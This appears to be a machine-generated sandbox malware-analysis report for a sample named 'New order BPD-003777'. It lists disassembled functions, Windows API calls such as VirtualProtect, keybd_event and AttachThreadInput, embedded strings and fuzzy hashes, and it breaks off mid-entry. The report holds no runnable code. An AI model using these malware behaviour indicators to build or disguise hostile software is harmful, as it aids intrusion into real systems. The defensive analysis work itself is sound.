Instruction ID: c0cde29775604d35ade31848d0db2ac3e87753ada73efb5dd65733d070f850d0
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: 2512CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 0029FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0029FD1F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b2b05809ac3cd7e0dec0de59d0201052a26cc31055d44f98e326e932954a2149
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6B310675A2010ADBCB98CF59D680969F7A1FF49300B24C6A6E809CF655D731EDE1CBD0

Function 00289CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00289CBD

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 20e9a0d7c2be2c3aa7e9b108d6412dea4dd30ec5ed6a580b663aa0def0048342
Instruction ID: 777a61cac4867791d370bae9a35cfa92f03795ae1ac5fd95ccab37704a8bd5a6
Opcode Fuzzy Hash: 20e9a0d7c2be2c3aa7e9b108d6412dea4dd30ec5ed6a580b663aa0def0048342
Instruction Fuzzy Hash: EDF028B32116016FD710AF28C802A67FB98EF48760F14852AFA19CB1D1DB71E4208BA0

Function 002B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 002B3852

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eaee9ade5e0cf9c291c020ac9ddc3f3c6c894906bd0fa6b1c1e0156ca71d48e3
Instruction ID: db14f882722bf4936bd6724ec271359f585810d6083aa0b4deb9cab08c75ddfe
Opcode Fuzzy Hash: eaee9ade5e0cf9c291c020ac9ddc3f3c6c894906bd0fa6b1c1e0156ca71d48e3
Instruction Fuzzy Hash: 35E0E53217022667D7216EAA9C00BDA3649AB827F0F0A0031BC0492491DF50DD2185E2

Function 002ECCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,?,002CEE51,00343630,00000002), ref: 002ECD26

Part of subcall function 002ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,002ECD19,?,?,?), ref: 002ECC59
Part of subcall function 002ECC37: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,002ECD19,?,?,?,?,002CEE51,00343630,00000002), ref: 002ECC6E
Part of subcall function 002ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,002ECD19,?,?,?,?,002CEE51,00343630,00000002), ref: 002ECC7A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 325f63b52aa1a83cb1bead8f835ee5f863dd089d8182d5aaafec0ccdb99b6072
Instruction ID: dbbc8f14fdb5fd56c54124b96345d165f76d9cf5ac93d1a0cdd1de60edf2a599
Opcode Fuzzy Hash: 325f63b52aa1a83cb1bead8f835ee5f863dd089d8182d5aaafec0ccdb99b6072
Instruction Fuzzy Hash: 5EE0397A400604EFC7219F8ADD008AABBF8FF84360720852FE99682110D3B1AA65DB60

Function 00282DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00282DC4

Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: fdfad0e46c98aadce4c55c98d11e1e23e4f1120ea2410d0dfc99d205b34c1a83
Instruction ID: dcfa94cb94a5ed1ab53acb80a59425f468956007cf6e979a6d65c4c7c85ce12a
Opcode Fuzzy Hash: fdfad0e46c98aadce4c55c98d11e1e23e4f1120ea2410d0dfc99d205b34c1a83
Instruction Fuzzy Hash: 54E0C276A002245BCB21A2989C0AFEA77EDDFC8794F0441B5FD09E7248DA70ED908A90

Function 00282B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00283837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908

Part of subcall function 0028D730: GetInputState.USER32 ref: 0028D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00282B6B

Part of subcall function 002830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0028314E

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 554742d4f5d4723fc86cf911415c77ae01b537e72d3d88c1eadea5094c275f22
Instruction ID: 424e19573e8f604d3dc2a758d38fd87ed872eb9d46b1a709c0c5f428b3097115
Opcode Fuzzy Hash: 554742d4f5d4723fc86cf911415c77ae01b537e72d3d88c1eadea5094c275f22
Instruction Fuzzy Hash: EFE0262D32220402CA04FB31A812ABDE35D8BD5716F40253EF042831E3CE2449A94B12

Function 00281CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00281CBC

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
Instruction ID: a4d922c7cca78bc7add6c34f92639aa56b5c94d6be59202a4fff0d398e5bbd13
Opcode Fuzzy Hash: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
Instruction Fuzzy Hash: AAC0923A2C0304AFF2178B81FC5AF51B76DA34EB02F048801F609A95F3D3A22820EA50

Function 00286246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,002C24E0), ref: 00286266

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f53c87d0902514d6959946c767444d367a8227404ac973ce03f34e4a58628e78
Instruction ID: 8dc1e1923075ac83771e8f21f356375a2de23ee1bcf143df9fb4b26f1bf273d8
Opcode Fuzzy Hash: f53c87d0902514d6959946c767444d367a8227404ac973ce03f34e4a58628e78
Instruction Fuzzy Hash: F8E0B679411B12CFC3715F1AE818452FBF9FFE53713208A6ED4E5926A4D3B058968F50

Function 0146D3D8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0146D3E9

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 6fefcbd7b165c7def0ecb1d39316ae805e0cc761c91985e85f69b81c248c0323
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: DAE0E67494010DDFDB00DFF4D6496ED7BB4EF04301F104161FD05D2281D6309D508A62

Non-executed Functions

Function 00319576 Relevance: 68.9, APIs: 36, Strings: 3, Instructions: 625windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?), ref: 0031961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0031969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003196C9
SendMessageW.USER32 ref: 003196F2
GetKeyState.USER32(00000011), ref: 0031978B
GetKeyState.USER32(00000009), ref: 00319798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003197AE
GetKeyState.USER32(00000010), ref: 003197B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003197E9
SendMessageW.USER32 ref: 00319810
SendMessageW.USER32(?,00001030,?,00317E95), ref: 00319918
SetCapture.USER32(?), ref: 0031994A
ClientToScreen.USER32(?,?), ref: 003199AF
InvalidateRect.USER32(?,00000000,00000001,?), ref: 003199D6
ReleaseCapture.USER32 ref: 003199E1
GetCursorPos.USER32(?), ref: 00319A19
ScreenToClient.USER32(?,?), ref: 00319A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00319A80
SendMessageW.USER32 ref: 00319AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00319AEB
SendMessageW.USER32 ref: 00319B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00319B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00319B4A
GetCursorPos.USER32(?), ref: 00319B68
ScreenToClient.USER32(?,?), ref: 00319B75
GetParent.USER32(?), ref: 00319B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00319BFA
SendMessageW.USER32 ref: 00319C2B
ClientToScreen.USER32(?,?), ref: 00319C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00319CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00319CDE
SendMessageW.USER32 ref: 00319D01
ClientToScreen.USER32(?,?), ref: 00319D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00319D82

Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952

GetWindowLongW.USER32(?,000000F0), ref: 00319E05

Strings

F, xrefs: 00319D07
p#5, xrefs: 00319990
@GUI_DRAGID, xrefs: 0031997D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
String ID: @GUI_DRAGID$F$p#5
API String ID: 1312020300-3183100334
Opcode ID: 98af0d9459d2980db87e6b6192b1401717c7a0296c14b503598de12f288cffec
Instruction ID: 746b046aabed586b58cf5b0eef5cc78009ba95221406516b5eb412d3511d0724
Opcode Fuzzy Hash: 98af0d9459d2980db87e6b6192b1401717c7a0296c14b503598de12f288cffec
Instruction Fuzzy Hash: 83425C74204241AFD72ACF24CC54BEABBE9FF8D320F15461AF599872A1D731A8A4CF51

Function 00314873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003148F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00314908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00314927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0031494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0031495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0031497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003149AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003149D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00314A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A7E
IsMenu.USER32(?), ref: 00314A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314B20
GetWindowLongW.USER32(?,000000F0), ref: 00314B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00314BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00314C82
wsprintfW.USER32 ref: 00314CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00314CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00314D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00314D5A

Strings

0, xrefs: 00314AC2
%d/%02d/%02d, xrefs: 00314CA8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$0
API String ID: 4054740463-4206205729
Opcode ID: 2292e866f3f31cb470f526d430d6b29aff62cb003d5cf299b20f9b6591820f21
Instruction ID: 93448a8115ac6bdac0b2aa0ce07b9858895d36afdb703825fd28dd6fb3c99372
Opcode Fuzzy Hash: 2292e866f3f31cb470f526d430d6b29aff62cb003d5cf299b20f9b6591820f21
Instruction Fuzzy Hash: 9B12F071640214ABEB2A8F28CD49FEEBBF8EF49710F144129F915DB2E1DB749981CB50

Function 0029F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0029F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002DF474
IsIconic.USER32(00000000), ref: 002DF47D
ShowWindow.USER32(00000000,00000009), ref: 002DF48A
SetForegroundWindow.USER32(00000000), ref: 002DF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4AA
GetCurrentThreadId.KERNEL32 ref: 002DF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 002DF4DE
SetForegroundWindow.USER32(00000000), ref: 002DF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF4F6
keybd_event.USER32(00000012,00000000), ref: 002DF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF50B
keybd_event.USER32(00000012,00000000), ref: 002DF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF519
keybd_event.USER32(00000012,00000000), ref: 002DF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF528
keybd_event.USER32(00000012,00000000), ref: 002DF52D
SetForegroundWindow.USER32(00000000), ref: 002DF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 002DF557

Strings

Shell_TrayWnd, xrefs: 002DF46F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
Instruction ID: f89819f9bcb69829e1538d410d08340e13bc1896844a0ddfee1985396a66760b
Opcode Fuzzy Hash: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
Instruction Fuzzy Hash: 0931A371AA0318BFEB216FB55C4AFFF7E6CEB48B50F105026FA01E61D1C6B05D10AA64

Function 0031911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

DragQueryPoint.SHELL32(?,?), ref: 00319147

Part of subcall function 00317674: ClientToScreen.USER32(?,?), ref: 0031769A
Part of subcall function 00317674: GetWindowRect.USER32(?,?), ref: 00317710
Part of subcall function 00317674: PtInRect.USER32(?,?,?), ref: 00317720

SendMessageW.USER32(?,000000B0,?,?), ref: 003191B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003191BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003191DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00319225
SendMessageW.USER32(?,000000B0,?,?), ref: 0031923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00319255
SendMessageW.USER32(?,000000B1,?,?), ref: 00319277
DragFinish.SHELL32(?,?,?,?), ref: 0031927E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?,?,?,?), ref: 00319371

Strings

@GUI_DROPID, xrefs: 0031929E
p#5, xrefs: 003192BB
@GUI_DRAGFILE, xrefs: 00319320
@GUI_DRAGID, xrefs: 003192E9

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#5
API String ID: 4085959399-653977726
Opcode ID: cc1fe4f3cab7f4a29d90e6958d9d7c3316b7f7cc80af349dcc8cd8a94fd21df9
Instruction ID: bc178f2bbd6e39acfc09b053d0f7878f4f05f8a6af9f4ebf9e1287ae219613b9
Opcode Fuzzy Hash: cc1fe4f3cab7f4a29d90e6958d9d7c3316b7f7cc80af349dcc8cd8a94fd21df9
Instruction Fuzzy Hash: 50618C71108301AFD706EF60DC85EAFBBE8EF89750F04092EF595971A0DB309A99CB52

Function 0029AFAC Relevance: 18.4, Strings: 14, Instructions: 881COMMON

Download Yara Rule

Strings

BSR_ANYCRLF), xrefs: 002D81B5
CR), xrefs: 002D811C
LIMIT_RECURSION=, xrefs: 002D809A
ANYCRLF), xrefs: 002D8190
UCP), xrefs: 002D7F9C
NO_START_OPT), xrefs: 002D7FDE
LIMIT_MATCH=, xrefs: 002D7FFF
BSR_UNICODE), xrefs: 002D81CF
NO_AUTO_POSSESS), xrefs: 002D7FBD
UTF16), xrefs: 002D7F5E
UTF), xrefs: 002D7F89
ANY), xrefs: 002D8173
CRLF), xrefs: 002D8156
LF), xrefs: 002D8139

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
